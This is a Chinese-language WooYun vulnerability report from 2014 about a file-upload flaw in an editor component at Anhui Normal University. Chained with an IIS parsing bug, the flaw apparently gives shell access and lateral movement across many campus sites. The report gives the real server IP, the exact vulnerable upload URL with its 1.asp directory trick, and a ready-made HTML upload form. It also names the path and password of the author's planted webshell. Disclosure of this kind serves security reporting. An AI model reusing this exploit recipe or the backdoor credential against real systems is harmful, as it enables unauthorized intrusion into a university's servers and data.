当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079847

漏洞标题:安徽师范大学可内网漫游多台服务器沦陷

相关厂商:安徽师范大学

漏洞作者: 小骇

提交时间:2014-10-20 11:59

修复时间:2014-10-25 12:00

公开时间:2014-10-25 12:00

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-20: 细节已通知厂商并且等待厂商处理中
2014-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

安徽师范大学....学校呀,不多说了,看下面吧!

详细说明:

安徽师范大学可内网漫游,多台服务器沦陷。
具体说是一个分站漏洞的服务器沦陷,导致了这个现象。
好吧,漏洞网址在:http://210.45.192.200/这个服务器上面,
这台服务器控制着学校以下网站:

cysj  大学生创业实践中心 001  ok3w
luqu 高考录取查询
xkcj 艺术校考成绩查询
xklq 艺术校考录取查询
xsc 皖江学生处 002 ok3w
yswb 艺术校考网报平台
yuwen 大学语文精品课程 003 ok3w
exam 大学语文选择题在线测试
zuoye 大学语文作业系统
shitiku 大学语文试题库系统
xywh 校园文化资源
sucai 素材资源
zhuanti 专题讲座
anli 教学案例
MP4 视频内容
edu 中小学教育信息化专题
dzgcx 电子工程系网站 aspcms
rsc 人事处 aspcms
xcb 宣传部 otcms
hxgcx 化学工程系 aspcms
ncre37cj 37次成绩考试查询
jpkcdw 网页设计精品课程 aspcms
news 新闻网 php
gbz 广播站 php
jzt 记者团 php
syzx 实验中心 ok3w 004
xljk 心理健康网 xycms
shetuan 社团联合会 xycms
xsh 学生会 xycms
wjgh 工会 phpcms
jpkckj 会计学精品课程 ok3w
card 会员卡收费系统 asp
school 无纸化考试系统 asp
jpkcdz 电子自动化精品课程 aspcms
wjkc 课酬统计系统 php
wjxq 学前教育系 php
vote 在线投票 asp
wjkc2 课酬系统3.0 php
szb 思政部 aspcms


这个漏洞出现在xsh这个站点上面,别的站点也有,是一个上传漏洞并配合IIS的解析漏洞,可拿下shell,
漏洞地址:http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp

QQ图片20141018111124.jpg


是上传的漏洞,就构造表单上传吧
表单如下:

<form action="http://210.45.192.200/xsh/admin/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=1.asp"method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100><br><br><input type=submit value=upload></form>


上传一个图片马,直接拿下shell。

QQ图片20141018111147.jpg

漏洞证明:

大马走起,开始内网漫游,http://210.45.192.200/xsh/news.asp 密码:xiaohai


无意之间已有重大发现:请看截图

QQ图片20141018111705.jpg

QQ图片20141018111616.jpg


在网吧,没钱了,先下了。再补充

修复方案:

版权声明:转载请注明来源 小骇@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-10-25 12:00

厂商回复:

最新状态:

暂无